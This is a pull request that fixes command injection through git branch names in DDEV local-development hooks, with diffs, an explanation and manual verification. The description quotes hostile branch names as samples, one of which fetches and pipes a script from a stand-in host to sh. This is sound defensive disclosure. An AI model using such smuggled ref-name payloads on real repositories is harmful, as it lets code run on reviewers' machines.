### PR TITLE
fix(ddev): treat git ref names as untrusted in the local dev tooling

### DIFF
--- a/.ddev/commands/web/generate-index
+++ b/.ddev/commands/web/generate-index
@@ -57,6 +57,16 @@ if command -v git &> /dev/null && git rev-parse --is-inside-work-tree &> /dev/nu
     GIT_COMMIT_SHORT=$(git rev-parse --short HEAD 2>/dev/null || echo "0000000")
     GIT_COMMIT_MSG=$(git log -1 --pretty=%s 2>/dev/null | head -c 50 || echo "No commit")
 
+    # These values are spliced into the sed expressions below, so they are treated
+    # as untrusted: git permits "|" and ";" in a ref name, and an unescaped "|"
+    # terminates the s|…|…| replacement and lets the rest of the name be read as
+    # further sed commands. Restrict the ref-derived values to characters that
+    # cannot do that; the commit message keeps its escaping since it is free text.
+    GIT_BRANCH=$(printf '%s' "$GIT_BRANCH" | tr -cd 'A-Za-z0-9._/-' | cut -c1-100)
+    GIT_COMMIT_SHORT=$(printf '%s' "$GIT_COMMIT_SHORT" | tr -cd 'A-Za-z0-9' | cut -c1-40)
+    [ -n "$GIT_BRANCH" ] || GIT_BRANCH="main"
+    [ -n "$GIT_COMMIT_SHORT" ] || GIT_COMMIT_SHORT="0000000"
+
     # Escape special characters for sed
     GIT_COMMIT_MSG=$(echo "$GIT_COMMIT_MSG" | sed 's/[&/\]/\\&/g')
 fi

--- a/.ddev/config.yaml
+++ b/.ddev/config.yaml
@@ -25,6 +25,19 @@ hooks:
         COMMIT=$(git rev-parse --short HEAD 2>/dev/null || echo "unknown")
         PR=$(gh pr view --json number -q .number 2>/dev/null || echo "unknown")
 
+        # A branch name is attacker-controlled input, not a trusted label: git accepts
+        # quotes, semicolons, $, backticks and > in ref names, and these values are
+        # interpolated into a command string that a shell inside the container runs.
+        # Checking out a fork PR would otherwise be enough to execute arbitrary
+        # commands there on `ddev start`. Keep only characters that cannot terminate
+        # a quoted string or start a new command.
+        BRANCH=$(printf '%s' "$BRANCH" | tr -cd 'A-Za-z0-9._/-' | cut -c1-100)
+        COMMIT=$(printf '%s' "$COMMIT" | tr -cd 'A-Za-z0-9' | cut -c1-40)
+        PR=$(printf '%s' "$PR" | tr -cd 'A-Za-z0-9' | cut -c1-20)
+        [ -n "$BRANCH" ] || BRANCH="unknown"
+        [ -n "$COMMIT" ] || COMMIT="unknown"
+        [ -n "$PR" ] || PR="unknown"
+
         # Write git info as JSON to web container
         ddev exec "printf '{\"branch\":\"%s\",\"commit\":\"%s\",\"pr\":\"%s\"}' '$BRANCH' '$COMMIT' '$PR' > /var/www/html/.git-info.json"
 


### PR DESCRIPTION
Closes a command-injection finding from the completed Claude Security scan (the candidate whose verification panel was cut short by a usage limit in the previous run, now panelled).

## The problem

Git accepts far more in a ref name than it looks: only spaces and `~^:?*[\` plus control characters are rejected. Quotes, `;`, `$`, backticks, `>` and `|` are all legal. Two places treated a ref-derived value as a trusted label:

**1. `.ddev/config.yaml` post-start hook** — `$BRANCH` is interpolated into the command string `ddev exec` passes to a shell in the web container (the `>` redirection only works because a shell interprets it):

```sh
ddev exec "printf '…' '$BRANCH' … > /var/www/html/.git-info.json"
```

A branch named `fix/typo';curl${IFS}http://evil/x|sh;'` closes the quote and appends commands. The reachable path is ordinary review work: `gh pr checkout <fork PR>` then `ddev start` (or `make up`). The container has the repository bind-mounted read-write, and the payload lives only in the ref name — the PR diff looks innocuous.

**2. `.ddev/commands/web/generate-index`** — `$GIT_BRANCH` is interpolated into `sed -e "s|{{GIT_BRANCH}}|$GIT_BRANCH|g"`. A `|` in the branch name terminates the replacement and the remainder is parsed as further sed commands. Notably the commit message on the adjacent line *was* already escaped for sed; the branch name was not.

## The fix

Both ref-derived values are restricted to characters that cannot terminate a quoted string, start a command, or close a sed expression, with a fallback to the existing placeholder if nothing remains:

```sh
BRANCH=$(printf '%s' "$BRANCH" | tr -cd 'A-Za-z0-9._/-' | cut -c1-100)
```

The commit message keeps its existing sed escaping — it is free text, not a ref name, so escaping rather than restricting is right there.

## Verification

Reproduced both command shapes with hostile values, before and after:

| Case | Before | After |
|---|---|---|
| `fix/typo';id;'` through the `ddev exec` string | prints truncated JSON, then **executes `id`** (`uid=1001(cybot) …`) | `{"branch":"fix/typoid","commit":"abc1234","pr":"42"}`, nothing executed |
| `feat/a\|b` through the sed expression | `sed: -e expression #1, char 25: unknown option to 's'` | `branch: feat/ab` |

`git check-ref-format --branch "fix/typo';id;'"` and `--branch 'feat/a|b'` both confirm git accepts these names.

Ordinary branch names pass through byte-identical — checked `main`, `fix/security-scan-findings`, `release/1.2.0`, `feature/TICKET-123-desc`, `chore/typo3-14.3`.

`sh -n` and `shellcheck -S warning` are clean on the modified script; the YAML still parses and the hook body round-trips through `yq`.

## Limitations

- **No automated test.** The repo has no shell-test harness (PHPUnit, Vitest, Playwright only), and adding one would mean a new dev dependency. The verification above was run by hand; the commands are in the commit message so they can be re-run.
- **Sanitizing, not restructuring.** The stronger fix is to stop building a shell string at all — write the JSON on the host into the mounted project root, or pass values as argv. That depends on `/var/www/html` being the project-root mount, which I could not confirm without a running DDEV instance, so this PR closes the injection without betting on that.
- A branch name that is entirely stripped (e.g. all-CJK) now displays as `unknown` rather than breaking the hook.
